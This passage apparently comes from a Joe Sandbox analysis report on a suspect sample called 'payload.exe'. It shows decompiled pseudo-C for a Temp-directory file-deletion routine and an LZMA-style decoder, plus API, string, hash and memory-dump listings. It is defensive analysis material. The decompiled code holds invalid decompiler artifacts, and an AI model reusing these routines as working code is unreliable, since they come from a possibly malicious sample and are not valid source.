							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00405CF9(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405553(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00404F12(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x423788 =  *0x423788 + 1;
										} else {
											E00404F12(0xfffffff1, _t73);
											E00405BB4(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040559B(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x420d10 - 0x5c;
					if( *0x420d10 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00405FFD(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E0040576B(_t73);
							_t40 = E00405553(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00404F12(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00404F12(0xfffffff1, _t73);
							return E00405BB4(_t72, _t73, 0);
						}
						L33:
						 *0x423788 =  *0x423788 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004055a5
0x004055aa
0x004055b3
0x004055b6
0x004055be
0x004055c1
0x004055c4
0x004055cc
0x004055ce
0x004055cf
0x00000000
0x004055cf
0x004055da
0x004055dd
0x004055dd
0x004055dd
0x004055e1
0x004055f4
0x004055fb
0x00405600
0x00405604
0x00405614
0x00405606
0x0040560c
0x0040560c
0x00405619
0x0040561c
0x00405627
0x0040562d
0x00405632
0x00405642
0x00405644
0x0040564a
0x0040564d
0x00405650
0x00405708
0x00405708
0x0040570c
0x0040570e
0x0040570e
0x0040570e
0x0040570e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405656
0x00405656
0x0040565f
0x00405665
0x0040566a
0x0040566d
0x0040566f
0x00405673
0x00405675
0x00405675
0x00405673
0x00405678
0x0040567b
0x0040568e
0x00405690
0x00405695
0x0040569c
0x004056b7
0x004056bc
0x004056be
0x004056e2
0x004056c0
0x004056c0
0x004056c3
0x004056d7
0x004056c5
0x004056c8
0x004056d0
0x004056d0
0x004056c3
0x0040569e
0x004056a4
0x004056a6
0x004056ac
0x004056ac
0x004056a6
0x00000000
0x0040569c
0x0040567d
0x00405680
0x00405682
0x00000000
0x00000000
0x00405684
0x00405686
0x00000000
0x00000000
0x00405688
0x0040568c
0x00000000
0x00000000
0x00000000
0x004056e7
0x004056f1
0x004056f7
0x004056f7
0x00405702
0x00000000
0x00405702
0x0040561e
0x00405625
0x00000000
0x00000000
0x00000000
0x004055e3
0x004055e3
0x004055e5
0x00405712
0x00405714
0x00405717
0x00405768
0x00405768
0x00405768
0x00405719
0x0040571c
0x00405727
0x0040572c
0x0040572e
0x00000000
0x00000000
0x00405731
0x0040573d
0x00405742
0x00405744
0x00000000
0x0040575f
0x00405746
0x00405749
0x00000000
0x00000000
0x0040574e
0x00000000
0x00405755
0x0040571e
0x0040571e
0x00000000
0x0040571e
0x004055eb
0x004055ee
0x00000000
0x00000000
0x00000000
0x004055ee

APIs

DeleteFileA.KERNELBASE(?,?,75572754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055C4
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,75572754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040560C
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,75572754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040562D
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,75572754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405633
FindFirstFileA.KERNELBASE(00420D10,?,?,?,00409014,?,00420D10,?,?,75572754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405644
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F1
FindClose.KERNEL32(00000000), ref: 00405702

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004055A8
\*.*, xrefs: 00405606
"C:\Users\user\Desktop\payload.exe", xrefs: 0040559B

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\payload.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3868714241
Opcode ID: 76f1e121bb52446e7845555e709951626bcbdf8363e3df3583460cf1e56453c6
Instruction ID: 44541a5d5af4c0b2911f4644f2fa5328a4f1ed3919081d24b86541679c9c03d6
Opcode Fuzzy Hash: 76f1e121bb52446e7845555e709951626bcbdf8363e3df3583460cf1e56453c6
Instruction Fuzzy Hash: 9F51CF30804A04BADF217A658C85BBF7AB8DF82318F54847BF445761D2C73D4982EE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00406344 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406344() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406BE7))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
